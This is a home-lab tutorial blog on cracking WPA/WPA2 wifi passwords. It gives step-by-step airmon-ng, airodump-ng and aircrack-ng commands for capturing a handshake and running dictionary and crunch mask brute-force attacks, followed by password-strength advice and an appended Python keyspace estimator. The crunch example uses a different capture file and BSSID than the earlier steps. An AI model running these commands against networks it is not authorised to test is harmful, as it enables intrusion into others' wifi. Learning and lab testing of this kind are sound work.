Blog — Cracking WPA/WPA2 Passwords (home lab)
In today's technology world, protecting against online threats is as important as protecting against physical threats. In the past few years, internet usage has grown rapidly, and along with it threats and cyber crime have increased. So one has to know how to protect oneself from these threats.
One of the main access points for connecting to the internet is the wifi router. Wifi routers can now be found in hotels, homes, offices, and other public places. Most of them are vulnerable to attack. In this blog I'll share, step by step, how to crack WPA/WPA2 wifi passwords. This is for education purposes only.
I wrote this blog as part of the Red-teaming master certification from Hackeru.
About WEP, WPA, and WPA2
To improve on the weaknesses of WEP (Wired Equivalent Privacy), WiFi Protected Access (WPA) was created in 2003. This temporary enhancement still has relatively poor security but is easier to configure. WPA uses the Temporal Key Integrity Protocol (TKIP), which offers stronger encryption than WEP did.
A year later, in 2004, WiFi Protected Access 2 (WPA2) became available. WPA2 has stronger security and is easier to configure than the prior options. The main difference in WPA2 is that it uses the Advanced Encryption Standard (AES) instead of TKIP.
DISCLAIMER. This article is for learning purposes; we are not responsible for any harm caused while referring to it.
1. Lab Setup
a. Attacker machine — Kali Linux.
b. Wifi adapter that supports monitor mode
c. Wifi router (using my own router)
2. Capture Traffic and Handshake
Connect the wifi adapter to the host Kali machine.
Check the adapter interface by typing the "iwconfig" command.
Note: run the following commands as root.
Run the following command:
airmon-ng check kill
This command stops the network managers and then kills any remaining interfering processes.
Then enable monitor mode by entering the following command:
airmon-ng start wlan0
Then make sure monitor mode is active on the wifi adapter with the "iwconfig" command.
Managed mode is the default mode for all wireless devices.
The reason we need to change the mode from managed to monitor is that we want to capture not only the packets addressed to our device's MAC address but all packets, including those sent to the router and other devices. This is only possible when the WiFi adapter is in monitor mode.
Then, to see all the available networks around you, enter the following command:
airodump-ng wlan0mon
Capture the handshake:
airodump-ng -c 2 --bssid 12:84:52:9E:9C:54 -w wpa2handshake wlan0mon
- -c : channel of the router
- --bssid : BSSID of the router
- -w : prefix for the captured output file (airodump-ng appends -01.cap, giving wpa2handshake-01.cap)
After successfully capturing the handshake we can move to the next step, i.e. brute-forcing the password using a dictionary attack.
aircrack-ng wpa2handshake-01.cap -w /usr/share/wordlists/rockyou.txt
- wpa2handshake-01.cap: the network capture file
- rockyou.txt: a password dictionary file that contains millions of passwords
After running the command, aircrack-ng is able to find the password, which is
"9876543210"
Note: if the password is not in the dictionary, we can use "crunch" to generate passwords using different combinations.
An example of using crunch is shown below:
crunch 10 10 0123456789 -t 876%%%%%%% | aircrack-ng wpa_challenge-01.cap -w- -b C4:E9:0A:DD:CC:50
Protection from wifi attacks:
Having learned the attack, we should also learn how to protect against these types of attacks.
- Password-protect the wifi network.
- Use WPA/WPA2 encryption instead of WEP.
- Choose a strong password that combines uppercase, lowercase, numbers, and special characters.
The chart below shows how much time is required to crack passwords of different complexities.
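To put numbers behind that chart, here is an added Python example (not from the original post) that estimates the worst-case keyspace, and the time to exhaust it, for a password of a given length and character mix, using the recovered key "9876543210" as one of the constructed samples. The guess rate of 100,000 guesses per second is an assumed illustrative figure, not a measurement; real rates depend on the attacker's hardware.

```python
import string

# Character classes named in the password advice above: uppercase,
# lowercase, number and special character.
CLASSES = {
    "upper": string.ascii_uppercase,   # 26
    "lower": string.ascii_lowercase,   # 26
    "digit": string.digits,            # 10
    "special": string.punctuation,     # 32
}

# Assumed illustrative rate for offline guessing against a captured
# handshake. This is a placeholder, not a benchmark.
ASSUMED_GUESSES_PER_SECOND = 100_000


def classes_used(password: str) -> set:
    """Names of the character classes that actually occur in password."""
    return {name for name, chars in CLASSES.items()
            if any(c in chars for c in password)}


def meets_policy(password: str) -> bool:
    """True if the password mixes all four classes, as the advice recommends."""
    return classes_used(password) == set(CLASSES)


def keyspace(password: str) -> int:
    """Candidates an exhaustive search over the same classes and length covers."""
    alphabet = sum(len(CLASSES[name]) for name in classes_used(password))
    return alphabet ** len(password)


def worst_case_seconds(password: str,
                       rate: float = ASSUMED_GUESSES_PER_SECOND) -> float:
    """Worst-case time to try every candidate at the given guess rate."""
    return keyspace(password) / rate


def crack_time_table(samples, rate=ASSUMED_GUESSES_PER_SECOND):
    """Rows of (password, length, classes, meets policy, worst-case days)."""
    rows = []
    for pw in samples:
        days = worst_case_seconds(pw, rate) / 86400
        rows.append((pw, len(pw), sorted(classes_used(pw)),
                     meets_policy(pw), round(days, 3)))
    return rows


if __name__ == "__main__":
    # Constructed samples: the key recovered above and two stronger alternatives.
    for row in crack_time_table(["9876543210", "Passw0rd!", "Tr0ub4dor&3hammer"]):
        print(row)
```

Digits-only keys of length 10 sit in a keyspace of 10^10, which the crunch mask above shrinks to 10^7 by fixing the first three characters; mixing all four classes at the same length raises it to 94^10.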